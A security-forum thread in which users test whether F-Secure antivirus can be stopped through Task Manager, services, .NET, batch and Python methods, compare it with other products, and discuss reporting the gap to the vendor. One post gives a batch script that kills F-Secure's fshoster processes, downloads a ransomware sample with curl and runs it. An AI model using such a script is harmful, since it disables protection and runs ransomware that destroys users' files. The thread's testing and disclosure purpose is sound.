On the topic of terminating F-Secure processes....

MacDefender

Level 14
Verified
Oct 13, 2019
685
Often times, users are unsettled that with F-Secure, you can "kill" F-Secure in Task Manager by terminating the F-Secure/Ultralight Hoster processes. This is definitely true, but it doesn't necessarily mean malware can do the same.


Here's some tests. At the conclusion of each test, I tried to execute a script that downloads an EICAR test file and executes it, instead of trusting the Windows Security Center status:

Test #1: Kill in Task Manager: F-Secure Killed
Test #2: Use Services.msc, stop the F-Secure related services: F-Secure killed.
Test #3: Use .NET executable, kill "fshoster" and "fshoster64" processes: Protected. DeepGuard triggered, "Tried to change another application"


1623790683928.png

Test #4: Use .NET executable, stop F-Secure services: Protected, DeepGuard triggered, "Tried to change another application"
1623791227037.png


Test #5: Use Batch file and taskkill or net stop to do the same thing as test 3 and 4: F-secure terminated, protection lost
Test #6: Use Python script (and Python from the Windows Store) and shell out to taskkill or net stop to do the same thing as test 3 and 4: F-secure terminated, protection lost



Conclusion:

DeepGuard stops certain methods of killing F-Secure but not others, pretty consistent with DeepGuard's strengths and weaknesses. This protection is relatively weak and can easily be defeated by use of trusted binaries to do the dirty work.
 

Attachments

  • 1623791843606.png
    1623791843606.png
    39.8 KB · Views: 124

MacDefender

Level 14
Verified
Oct 13, 2019
685
Can you try Eset, Kaspersky and Norton?
If I have time I might, but last time I looked, all 3 of those products have protection against being killed. Even if you're an elevated process, they reject attempts to kill or stop them except via their uninstaller, which then requires you to click some sort of dialog to acknowledge the action.


F-Secure is kind of unique for this test in that it's one of the few modern AV software that doesn't implement any kind of self-protection except the behavior blocker component.
 

MacDefender

Level 14
Verified
Oct 13, 2019
685
I tried with norton. Can't be killed with task manger, server can't be stopped(access denied), task kill denied. The other ones idk
If you can’t kill it with task manager or service manager, none of these techniques will work. AVs with self protection are hooking into Windows to deny allowing their processes to be killed at a fundamental level.
 

peterfat111

Level 7
Mar 25, 2021
341
If I have time I might, but last time I looked, all 3 of those products have protection against being killed. Even if you're an elevated process, they reject attempts to kill or stop them except via their uninstaller, which then requires you to click some sort of dialog to acknowledge the action.


F-Secure is kind of unique for this test in that it's one of the few modern AV software that doesn't implement any kind of self-protection except the behavior blocker component.
yea, that could be very easily attacked since it could be easily stopped. F secure should really wok on that.
 

upnorth

Moderator
Verified
Staff member
Malware Hunter
Jul 27, 2015
4,444
Agreed! It would be nice if DeepGuard could block every attempt to kill F-Secure , but it doesn’t. It seems really easy to implement this kind of industry standard anti-tamper.
True and very well a possible solution.

But important enough to know, with a SUA ( standard user account ) same that myself use 24/7, you can't kill F-Secure without correct admin credential or an elevation bypass, but I still got curious enough and slapped F-Secure with a real live malware sample on the admin account, and the result was not what I expected. F-Secure failed hard even with Ultralight service up and running. Report sent. (y)🤞
 

upnorth

Moderator
Verified
Staff member
Malware Hunter
Jul 27, 2015
4,444
it is a little disturbing to know you can stop fsecure .......
To be fair towards any AV, as in the Hub we had samples that been able to completely un-install them without any need of user interaction and that would been immense much harder on a SUA, but in this specific case on how F-Secure handle it's self-protection, it for sure needs improvement.
 

gery79

Level 10
Verified
Jun 21, 2011
474
To be fair towards any AV, as in the Hub we had samples that been able to completely un-install them without any need of user interaction and that would been immense much harder on a SUA, but in this specific case on how F-Secure handle it's self-protection, it for sure needs improvement.
bruh
 

MacDefender

Level 14
Verified
Oct 13, 2019
685
Yeah to be fair I’ve not tried to extensively attack any of the other AV’s and their self protection recently. A few years ago I did spend about a half day removing Sophos from a server. It wasn’t easy but it was something malware can do with admin rights.

My main goal here was to test the vendor’s claim that they don’t need self protection because their behavior blocker works as self protection. Obviously as shown, there’s some truth and some holes to that idea.
 

Andrew3000

Level 8
Verified
Feb 8, 2016
349
A very simple way to bypass f-secure:
In this case you use garmin.exe which is the ransomware that hits the well-known company.
Do not run the command in any way on non-virtualized PCs. The malware encrypts all files and sensitive data can then be stolen.
How to use it?
Just copy the code below and put it into a .bat file and execute as admin. (remove XX and [ ] from the link)
Issue already reported to f-secure

Code:
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T

curl.exe --output garmin.exe --url
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T

garmin.exe
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T
 
Last edited by a moderator:

upnorth

Moderator
Verified
Staff member
Malware Hunter
Jul 27, 2015
4,444
A very simple way to bypass f-secure:
In this case you use garmin.exe which is the ransomware that hits the well-known company.
Do not run the command in any way on non-virtualized PCs. The malware encrypts all files and sensitive data can then be stolen.
How to use it?
Just copy the code below and put it into a .bat file and execute as admin. (remove XX and [ ] from the link)
Issue already reported to f-secure
Partially correct, but that won't work unless one actually got the correct admin credentials or a working elavation bypass. That is extremely far from "simple".

As mentioned already several times in this thread alone, this issue only works on the admin account and sure it's always good with reports, but with constant repeats it starts getting redundant and F-Secure risk not want to jump into this thread, as I already got a reply with some answers and I genuine want this thread to stay open, please try to show a little patience and I promise to add that info as soon I hopefully heard a bit more.

As of now, I can say this, they are fully aware of the issue.
 

MacDefender

Level 14
Verified
Oct 13, 2019
685
I already got a reply with some answers and I genuine want this thread to stay open, please try to show a little patience and I promise to add that info as soon I hopefully heard a bit more.

As of now, I can say this, they are fully aware of the issue.
Thanks, looking forward to this! FWIW if you’ve got a channel of communication with F-Secure, I am curious if they have plans for addressing how DeepGuard seems totally blind to BAT files as well as certain script engines like Python or Chrome V8. If DeepGuard protected those paths as aggressively as we see DeepGuard reacting to malicious EXE/Doc/VBS actors, I think that would be hugely beneficial.
 

upnorth

Moderator
Verified
Staff member
Malware Hunter
Jul 27, 2015
4,444
Thanks, looking forward to this! FWIW if you’ve got a channel of communication with F-Secure, I am curious if they have plans for addressing how DeepGuard seems totally blind to BAT files as well as certain script engines like Python or Chrome V8. If DeepGuard protected those paths as aggressively as we see DeepGuard reacting to malicious EXE/Doc/VBS actors, I think that would be hugely beneficial.
I also got the feeling that for example malicious BAT files detection is something that needs to be improved, but 100% totally blind I can't say because F-Secure does actually from time to time catch even those as clearly can be seen here:
 
Top